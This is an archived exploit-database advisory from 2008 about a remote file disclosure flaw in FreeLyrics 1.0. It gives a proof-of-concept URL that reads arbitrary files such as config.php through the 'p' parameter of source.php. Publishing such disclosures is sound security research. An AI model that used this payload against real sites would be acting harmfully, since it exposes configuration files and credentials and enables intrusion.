[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : FreeLyrics 1.0 (source.php p) Remote File Disclosure Vulnerability
# Published : 2008-12-19
# Author : Piker
# Previous Title : myPHPscripts Login Session 2.0 XSS/Database Disclosure Vulns
# Next Title : OneOrZero helpdesk 1.6.*. Remote Shell Upload Exploit


################## Piker #######################################
#
#
#    FreeLyrics Remote Source Code Disclosure Vulnerability
#

#
#    Affected software: FreeLyrics
#    Vendor: http://lyrics.sourceforge.net/
#    Risk: Medium
#
################################################################

#
#    http://[target]/[path]/source.php?p=[FILE]
#
#   PoC: http://[target]/[path]/source.php?p=config.php
#
#   
################################################################
#
#         Found by Piker [piker0x90(at)gmail(dot)com]

#            D.O.M Labs - Security Researchers
#           www.domlabs.org
#
#
################################################################

# www.Syue.com [2008-12-19]